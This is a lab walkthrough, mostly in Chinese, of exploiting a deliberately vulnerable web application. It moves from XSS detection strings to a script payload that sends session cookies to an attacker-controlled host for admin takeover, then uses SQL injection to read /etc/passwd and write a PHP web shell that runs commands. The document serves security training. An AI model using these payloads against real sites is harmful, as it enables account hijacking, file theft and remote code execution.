XSS and MySQL FILE
References
Detection Cross-Site Scripting
- 簡單檢測:
'"><- 可以加入字串方便快速辨識,例如
1337'"><
- 可以加入字串方便快速辨識,例如
使用
<script>alert(1)</script>檢測可能會被WAF或其它防護機制擋下,使用像'"><會安全點。
| Payload | Result | Exploitability |
|---|---|---|
| 1337'">< | 1337'">< | 沒做編碼, 可以使用<script> tag |
| 1337'">< | 1337'">< | < 和 >被編碼,you can still find some Cross-Site Scripting bugs if you can inject directly inside a <script> tag, or in some tags like <a tag and <img tag. Also this encoding may not be applied everywhere. |
| 1337'">< | 1337'">< |
This is the encoding performed by a lot of filters. You can still get JavaScript to execute if you are injecting inside a <script> tag where your entry point is delimited by a single quote |
| 1337'">< | 1337'">< |
With this encoding, you will still be able to get JavaScript executed in very limited cases. For example, if the value is directly echoed without single or double quote <a id=[INPUT] or if you control a URL for example <a href="[INPUT]" and you can use the JavaScript handler: javascript:... |
Exploitation
- ISO檔會定時瀏覽執行網頁上的script,我們只要架好本地端server(10.0.2.128),當成惡意網站,當插入payload進http://10.0.2.130 的留言版後,ISO一旦瀏覽執行網頁上的script後,本地端server就會從log中收到竊取到的cookie。
- 惡意payload:
<script>document.write('<img src="http://10.0.2.128/?'+document.cookie+' "/>');</script> - 從log取得:
GET /?PHPSESSID=a0pgvu68i67l5fp449ecn2gav2 HTTP/1.1
- 惡意payload:
- 在browser的developer console加入偷到的cookie
document.cookie = "PHPSESSID=a0pgvu68i67l5fp449ecn2gav2"
- 連到http://10.0.2.130/admin/ 即會發現已經以admin身份登入了。
SQL injection with MySQL FILE
- http://10.0.2.130/admin/edit.php?id=0 頁面存在SQLi
UNION SELECT 1,@@version,load_file("/etc/passwd"),4
Exploitation to deploy a Web Shell
- 使用PHP array
id[]=技巧找出error messagehttp://10.0.2.130/admin/edit.php?id[]=1Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/post.php on line 111 Notice: Undefined variable: post in /var/www/classes/post.php on line 115- 得知目前路徑為
/var/www/classes/post.php
- Create file:
SELECT 1,2,3,4 INTO OUTFILE- 例如:
http://10.0.2.130/admin/edit.php?id=1 union select 1,2,3,4 into outfile "/var/www/classes/s.php"- 接著試連:
http://10.0.2.130/classes/test.php,但404 error
- 接著試連:
http://10.0.2.130/admin/edit.php?id=1 union select 1,2,3,4 into outfile "/var/www/s.php"同樣也失敗- 最後在
http://10.0.2.130/admin/edit.php?id=1 union select 1,2,3,4 into outfile "/var/www/css/s.php"可成功建立1 Welcome Welcome to my blog. Leave a comment if you like the new design :) \N 1 2 3 4SQLmap預設在使用
--os-pwn注入時並不會試著使用/css
- 例如:
- 確定可建立檔案後,我們再建一個檔案,同時將php system code放到某個欄位裡:
select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/z.php"
- 執行command:
http://10.0.2.130/css/z.php?c=uname -a1 Welcome Welcome to my blog. Leave a comment if you like the new design :) \N 1 2 Linux debian 2.6.32-5-686 #1 SMP Mon Sep 23 23:00:18 UTC 2013 i686 GNU/Linux 4